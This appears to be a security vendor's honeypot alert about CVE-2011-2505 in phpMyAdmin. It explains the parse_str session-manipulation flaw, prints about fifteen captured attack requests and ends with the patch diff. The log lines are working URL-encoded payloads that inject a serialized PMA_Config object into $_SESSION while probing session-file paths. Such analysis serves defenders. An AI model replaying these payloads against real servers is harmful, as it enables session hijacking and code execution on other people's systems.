[Honeypot Alert] phpMyAdmin Superglobal Session Manipulation Attack Detected

Our web honeypots have identified attempts to exploit CVE-2011-2505. OSVDB lists the vulnerabilty as - phpMyAdmin libraries/auth/swekey/swekey.auth.lib.php Swekey_login() Function Superglobal Session Manipulation Arbitrary PHP Code Execution.

Vulnerability Details

The vulnerability lies within the following code snippet of the libraries /auth/swekey/swekey.auth.lib.php file:

Line 268 has a call to "parse_str" which takes two arguments however this call only uses one. This means that any other QUERY_STRING parameters and values will be used within the same namespace. The results is that the attacker can take full control of the $_SESSION array.

Attack Attempts

Here are the attacks that capture from the honeypots:

77.38.12.98 - - [17/Jan/2012:01:55:14 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A10%3A%22%2Ftmp%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 77.38.12.98 - - [17/Jan/2012:01:55:15 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A14%3A%22%2Fvar%2Ftmp%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 77.38.12.98 - - [17/Jan/2012:01:55:16 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A18%3A%22%2Fvar%2Flib%2Fphp%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 77.38.12.98 - - [17/Jan/2012:01:55:16 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A19%3A%22%2Fvar%2Flib%2Fphp4%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 77.38.12.98 - - [17/Jan/2012:01:55:17 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A19%3A%22%2Fvar%2Flib%2Fphp5%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 77.38.12.98 - - [17/Jan/2012:01:55:18 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A26%3A%22%2Fvar%2Flib%2Fphp%2Fsession%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 77.38.12.98 - - [17/Jan/2012:01:55:19 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A27%3A%22%2Fvar%2Flib%2Fphp4%2Fsession%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 77.38.12.98 - - [17/Jan/2012:01:55:20 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A27%3A%22%2Fvar%2Flib%2Fphp5%2Fsession%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 77.38.12.98 - - [17/Jan/2012:01:55:21 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A21%3A%22%2Fshared%2Fsessionssess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 77.38.12.98 - - [17/Jan/2012:01:55:22 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A23%3A%22%2Fvar%2Fphp_sessions%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 77.38.12.98 - - [17/Jan/2012:01:55:23 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A19%3A%22%2Fvar%2Fsessions%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 77.38.12.98 - - [17/Jan/2012:01:55:24 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A23%3A%22%2Ftmp%2Fphp_sessions%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 77.38.12.98 - - [17/Jan/2012:01:55:25 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A19%3A%22%2Ftmp%2Fsessions%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 77.38.12.98 - - [17/Jan/2012:01:55:26 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A18%3A%22..%2F..%2F..%2Ftmp%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 77.38.12.98 - - [17/Jan/2012:01:55:27 -0600] "GET /mysql/index.php?session_to_unset=123&token=&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A21%3A%22..%2F..%2F..%2F..%2Ftmp%2Fsess_%22%3B%7D%7D HTTP/1.1" 200 6720 "http://moldquoteim.ufeinc.com/mysql/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"

As you can see, the attacker is attempting to inject new unserialized $_SESSION data. These attacks were identified by the following:

• IP Reputation Alert from the commercial ModSecurity Rules from Trustwave SpiderLabs Team
• Multiple alerts from the OWASP ModSecurity Core Rule Set

Code Patches

The phpMyAdmin /auth/swekey/swekey.auth.lib.php file has since been fixed by removing the use of the parse_str function and calling the $_GET variable to access the "session_to_unset" data instead of accessing the $_SERVER QUERY_STRING data:

--- a/libraries/auth/swekey/swekey.auth.lib.php +++ b/libraries/auth/swekey/swekey.auth.lib.php @@ -263,11 +263,10 @@ function Swekey_login($input_name, $input_go) } } -if (strstr($_SERVER['QUERY_STRING'],'session_to_unset') != false) +if (!empty($_GET['session_to_unset'])) { - parse_str($_SERVER['QUERY_STRING']); session_write_close(); - session_id($session_to_unset); + session_id($_GET['session_to_unset']); session_start(); $_SESSION = array(); session_write_close();